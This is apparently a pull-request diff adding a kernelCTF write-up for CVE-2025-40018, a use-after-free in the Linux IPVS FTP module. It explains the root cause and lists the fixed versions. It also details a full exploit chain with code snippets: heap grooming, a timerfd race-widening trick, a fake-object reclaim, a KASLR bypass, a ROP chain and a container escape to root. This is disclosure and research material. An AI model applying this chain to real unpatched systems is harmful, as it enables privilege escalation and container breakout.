Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
274 changes: 274 additions & 0 deletions pocs/linux/kernelctf/CVE-2025-40018_cos/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,274 @@
## 1. Overview

The vulnerability exists in the IP Virtual Server (IPVS) FTP helper module (`ip_vs_ftp`) and involves a Use-After-Free (UAF) in the module exit path. It occurs when the FTP application structure is freed during network namespace cleanup while still being referenced by active connections, leading to a UAF during connection flushing.

## 2. Root Cause Analysis

### 2.1. Module Exit and Application Free

When a network namespace is destroyed, the kernel iterates through the exit handlers of all registered per-netns subsystems. The `ip_vs_ftp` module registers its exit handler, `__ip_vs_ftp_exit()`, which is executed before the core IPVS cleanup handler.

In `__ip_vs_ftp_exit()`, the `unregister_ip_vs_app()` function is called to remove the FTP application.

```c
static void __ip_vs_ftp_exit(struct net *net)
{
struct netns_ipvs *ipvs = net_ipvs(net);
// [...]
unregister_ip_vs_app(ipvs, &ip_vs_ftp);
}
```

Inside `unregister_ip_vs_app()`, the `struct ip_vs_app` object representing the application template (variable `a`) is freed immediately using `kfree(a)` [1].

It is worth noting that the incarnations (`inc`) are also released via `ip_vs_app_inc_release()` [2], which uses `call_rcu`. Therefore, while `inc` remains memory-safe during the subsequent RCU-protected connection flush, it contains a pointer (`inc->app`) to the template `a` which has been freed immediately. This makes `inc->app` a dangling pointer, and `a` the victim object for exploitation.

```c
void unregister_ip_vs_app(struct netns_ipvs *ipvs, struct ip_vs_app *app)
{
struct ip_vs_app *a, *anxt, *inc, *nxt;
mutex_lock(&__ip_vs_app_mutex);

list_for_each_entry_safe(a, anxt, &ipvs->app_list, a_list) {
// [...]
list_for_each_entry_safe(inc, nxt, &a->incs_list, a_list) {
ip_vs_app_inc_release(ipvs, inc); // [2]
}

list_del(&a->a_list);
kfree(a); // [1] The application template is freed immediately!
// [...]
}
mutex_unlock(&__ip_vs_app_mutex);
}
```

### 2.2. Connection Cleanup and UAF

Following the execution of `__ip_vs_ftp_exit()`, the core IPVS cleanup handler `__ip_vs_cleanup_batch()` runs. This function flushes all remaining connections in the namespace.

```c
static void __net_exit __ip_vs_cleanup_batch(struct list_head *net_list)
{
// [...]
list_for_each_entry(net, net_list, exit_list) {
ipvs = net_ipvs(net);
ip_vs_conn_net_cleanup(ipvs); // [3] Flushes connections
// [...]
}
}
```

The connection flush path eventually reaches `ip_vs_unbind_app()`, which attempts to decrement the reference count of the application associated with the connection.

```c
void ip_vs_unbind_app(struct ip_vs_conn *cp)
{
struct ip_vs_app *inc = cp->app;
// [...]
ip_vs_app_inc_put(inc); // [4]
cp->app = NULL;
}
```

`ip_vs_app_inc_put()` decrements the incarnation's use count and then calls `ip_vs_app_put()` on the parent application.

```c
void ip_vs_app_inc_put(struct ip_vs_app *inc)
{
atomic_dec(&inc->usecnt);
ip_vs_app_put(inc->app); // [5] Accesses inc->app (which is 'a' from [1])
}

static inline void ip_vs_app_put(struct ip_vs_app *app)
{
module_put(app->module); // [6] UAF: Dereferences app->module
}
```

The vulnerability manifests at [6]. The pointer `app` refers to the object `a` that was freed at [1]. Dereferencing `app->module` constitutes a Use-After-Free.

### 2.3. The Race Window

The vulnerability is a deterministic Use-After-Free where the object is freed and used in the same kernel thread. To exploit it, we must artificially create a race condition to reclaim the memory between these two events.

#### Normal Execution

In a normal scenario:

```
CPU 0 (netns cleanup kthread)
-----------------------------
__ip_vs_ftp_exit()
kfree(app) // [Free]

__ip_vs_cleanup_batch()
ip_vs_conn_net_cleanup()
ip_vs_unbind_app()
ip_vs_app_put(app)
module_put(app->module) // [UAF] - Dereferencing freed memory
```

#### Exploitation (Winning the Race)

The exploit uses a timer interrupt to stall CPU 0, allowing CPU 1 to reclaim the freed object:

```
CPU 0 (netns cleanup kthread) CPU 1 (Spray Thread)
----------------------------- --------------------
__ip_vs_ftp_exit()
kfree(app) // [Free]

< TimerFD Interrupt Fires >
< HardIRQ -> SoftIRQ >
< Stall: Churning huge waitqueue >
Spray user_key_payload
// [Reclaim] 'app' slot allocated
// Fake object written

< Cleanup Resumes >
__ip_vs_cleanup_batch()
ip_vs_conn_net_cleanup()
ip_vs_unbind_app()
ip_vs_app_put(app)
module_put(app->module) // [UAF] - Dec(controlled addr)
```

## 3. Exploitation

### 3.1. Primitive

The UAF primitive allows us to perform an **Arbitrary Address Decrement**.
When `module_put(app->module)` is called on the reclaimed fake object:
1. We control `app->module`. Let's set it to `TARGET_ADDR - offsetof(struct module, refcnt)`.
2. `module_put` executes `atomic_dec(&module->refcnt)`.
3. This results in `atomic_dec(TARGET_ADDR)`.

We use this primitive to corrupt the `next` pointer of a `msg_msg` object, creating overlapping chunks on the kernel heap.

### 3.2. Triggering the Vulnerability

The exploitation involves two main components:
1. **Cleaner Thread (CPU 0):** The kernel worker thread processing `cleanup_net`. This thread performs the Free and the Use.
2. **Sprayer Thread (CPU 1):** The attacker thread running on a separate CPU. This thread handles heap grooming and the reclamation spray.

#### 3.2.1. Heap Grooming (CPU 1)

We target the `kmalloc-256` cache where `struct ip_vs_app` resides.
1. **Spray `pg_vec`:** We spray `pg_vec` to fill slabs on CPU 1.
2. **Create Holes:** We close specific sockets to create free slots for the victim object.
3. **Allocate Victim:** We trigger `unshare(CLONE_NEWNET)` to allocate the `ip_vs_ftp` application into one of our prepared slots on CPU 1.
4. **Cross-CPU Slab Freeze:** We free an *additional* object in the victim's slab. This transitions the slab from "Full" to "Partial" on CPU 1.

**Why Freeze?** When `kfree(app)` occurs on CPU 0, the object is returned to its owning slab. Since the slab is on CPU 1's partial list, CPU 1 can immediately reallocate from it. If we didn't do this before exiting netns, the object will be freed into a per-cpu cache on CPU 0 during `cleanup_net()`, making it impossible for CPU 1 to reclaim.

```c
static void freeze_victim_slab() {
// Free one object per slab to transition FULL -> PARTIAL on CPU 1
for (int i = 0; i < PACKET_SPRAY_CNT; i += KMALLOC_256_OBJS_PER_SLAB) {
close(packet_fds[i + SLOTS_PER_SLAB]);
packet_fds[i + SLOTS_PER_SLAB] = -1;
}
}
```

#### 3.2.2. Binding the Vulnerable Object

To trigger the UAF, we must create a dependency between a persistent `ip_vs_conn` and the victim object (`ip_vs_app`).

The exploit sets up an IPVS service on port 21 (FTP) and establishes a TCP connection to it. When the connection is created in `ip_vs_conn_new()`, the kernel checks if the protocol has any registered applications. Since `ip_vs_ftp` is registered for port 21, the connection is automatically bound to the FTP application incarnation.

```c
// net/netfilter/ipvs/ip_vs_conn.c
struct ip_vs_conn *
ip_vs_conn_new(...)
{
// ...
if (unlikely(pd && atomic_read(&pd->appcnt)))
ip_vs_bind_app(cp, pd->pp);
// ...
}

// net/netfilter/ipvs/ip_vs_proto_tcp.c
static int
tcp_app_conn_bind(struct ip_vs_conn *cp)
{
// ...
list_for_each_entry_rcu(inc, &ipvs->tcp_apps[hash], p_list) {
if (inc->port == cp->vport) {
// ...
cp->app = inc; // [1] Connection bound to FTP incarnation
// ...
}
}
return result;
}
```

This binding (`cp->app`) is critical. When the namespace is destroyed, `ip_vs_conn_flush()` cleans up this connection, accessing `cp->app->app`—the object that has just been freed by `ip_vs_ftp_exit`.

#### 3.2.3. Extending the Race Window (Timerfd Storm)

To reclaim the object between the Free and the Use on CPU 0, we employ a technique that transforms a tiny kernel race window into a large, hit-able target by racing against a hardware timer.

1. **Timerfd:** We create a `timerfd` and arm it to fire *exactly* when the cleanup thread is executing the critical section on CPU 0.
2. **Waitqueue Churn:** We attach thousands of `epoll` instances to this `timerfd`. When the timer expires, the hardware raises an interrupt on CPU 0. The interrupt handler wakes up all waiters on the `timerfd`. Because we have attached a massive number of `epoll` entries, the kernel is forced to churn through this list.
3. **The Stall:** This massive "thundering herd" effectively stalls the execution of the cleanup thread on CPU 0 for milliseconds, turning a microsecond-scale race into a stable, millisecond-scale window.

```c
tfd = SYSCHK(timerfd_create(CLOCK_MONOTONIC, 0));
do_epoll_enqueue(tfd, 17); // Enqueue thousands of epoll items

// ... inside the race loop ...
// Arm timer to fire just as cleanup_net starts
timerfd_settime(tfd, TFD_TIMER_CANCEL_ON_SET, &new, NULL);
```

#### 3.2.4. Reclaiming with `user_key_payload`

While CPU 0 is stalled, CPU 1 continuously sprays `user_key_payload` objects using `add_key()`. These objects fit in `kmalloc-256` and allow us to write arbitrary data into the freed object.

```c
void *spray_job(void *arg) {
bind_to_cpu(1);
while (1) {
// ... synchronization ...
spray_userkey(); // Reclaim the freed slot
// ... synchronization ...
cleanup_userkey();
}
}
```

We craft the payload to fake `struct ip_vs_app`, setting the `module` pointer to target our `msg_msg` object.

```c
static inline void set_dec_addr(uint64_t target) {
char *fake_ip_vs_app = user_key_payload;
// Point app->module to (Target Address - refcnt_offset)
*(uint64_t *)&fake_ip_vs_app[IP_VS_APP_OFFSETS_MODULE] = target - MODULE_OFFSETS_REFCNT;
}
```

### 3.3. Bypass KASLR

The vulnerability primitive does not provide a way to leak kernel addresses and is only exploitable when a valid kernel text address is known, as setting the `module` pointer requires it.

To address this, we use EntryBleed, a time-based side-channel attack, to leak the kernel base address. More details can be found at https://www.willsroot.io/2022/12/entrybleed.html or other kernelCTF submissions.

### 3.4. Privilege Escalation (Msg_msg Overlap)

1. **Heap Spray:** We spray ~1.37 GB of `msg_msg` objects to land one at a predictable physical address (`GUESSED_MSG_ADDR`).
2. **Corrupt `next`:** The UAF primitive decrements the `next` pointer of a message header. This causes it to point to a previous message's segment, creating two overlapping `msg_msgseg` objects.
3. **UAF on `pipe_buffer`:**
* We free the *first* overlapping segment (victim).
* We spray `pipe_buffer` objects, which are allocated into the now-freed slot.
* We free the *second* overlapping segment (target). Since they overlap, this frees the memory occupied by the `pipe_buffer`, creating a Use-After-Free condition on the `pipe_buffer` object.
4. **ROP Chain:**
* We spray `msg_msgseg` objects again to reclaim the freed `pipe_buffer` slot with controlled data.
* We overwrite the `pipe_buffer->ops` pointer with a fake vtable pointing to our gadgets.
* Triggering `pipe_release()` (by closing the pipe) invokes the fake release function, pivoting the stack to execute the ROP chain.

### 3.5. Container Escape

The exploit runs inside a container. The ROP chain includes a call to `switch_task_namespaces(init_nsproxy)` to switch the process back to the host's initial namespace, effectively breaking out of the container before spawning a root shell.
36 changes: 36 additions & 0 deletions pocs/linux/kernelctf/CVE-2025-40018_cos/docs/vulnerability.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,36 @@
# Vulnerability
The vulnerability is a Use-After-Free (UAF) issue in the IPVS subsystem caused by incorrect cleanup ordering during network namespace destruction. The FTP application helper (`ip_vs_ftp`) frees its application structure (`struct ip_vs_app`) in its exit handler `__ip_vs_ftp_exit`, which runs before the core IPVS cleanup handler `__ip_vs_cleanup_batch`. When `__ip_vs_cleanup_batch` subsequently flushes active connections, it dereferences the now-freed application structure via `cp->app->app`, leading to a UAF.

## Requirements to trigger the vulnerability
- Capabilities: CAP_NET_ADMIN
- Kernel configuration: CONFIG_NETFILTER, CONFIG_IP_VS, CONFIG_IP_VS_FTP
- User namespaces needed: Yes

## Commit which introduced the vulnerability
- [61b1ab4583e275af216c8454b9256de680499b19](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=61b1ab4583e275af216c8454b9256de680499b19)

## Commit which fixed the vulnerability
- Fixed in 5.4.301 with commit [8a6ecab3847c213ce2855b0378e63ce839085de3](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=8a6ecab3847c213ce2855b0378e63ce839085de3)
- Fixed in 5.10.246 with commit [421b1ae1574dfdda68b835c15ac4921ec0030182](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=421b1ae1574dfdda68b835c15ac4921ec0030182)
- Fixed in 5.15.195 with commit [1d79471414d7b9424d699afff2aa79fff322f52d](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=1d79471414d7b9424d699afff2aa79fff322f52d)
- Fixed in 6.1.156 with commit [53717f8a4347b78eac6488072ad8e5adbaff38d9](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=53717f8a4347b78eac6488072ad8e5adbaff38d9)
- Fixed in 6.6.112 with commit [8cbe2a21d85727b66d7c591fd5d83df0d8c4f757](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=8cbe2a21d85727b66d7c591fd5d83df0d8c4f757)
- Fixed in 6.12.53 with commit [dc1a481359a72ee7e548f1f5da671282a7c13b8f](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=dc1a481359a72ee7e548f1f5da671282a7c13b8f)
- Fixed in 6.17.3 with commit [a343811ef138a265407167294275201621e9ebb2](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=a343811ef138a265407167294275201621e9ebb2)
- Fixed in 6.18-rc1 with commit [134121bfd99a06d44ef5ba15a9beb075297c0821](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=134121bfd99a06d44ef5ba15a9beb075297c0821)

## Affected kernel versions
- 5.4.0 - 5.4.300
- 5.10.0 - 5.10.245
- 5.15.0 - 5.15.194
- 6.1.0 - 6.1.155
- 6.6.0 - 6.6.111
- 6.12.0 - 6.12.52
- 6.17.0 - 6.17.2

## Affected component, subsystem
- Netfilter
- IPVS

## Cause
- Use-After-Free
Original file line number Diff line number Diff line change
@@ -0,0 +1,2 @@
exploit: exploit.c
gcc $^ -pthread -static -o $@
Binary file not shown.
Loading
Loading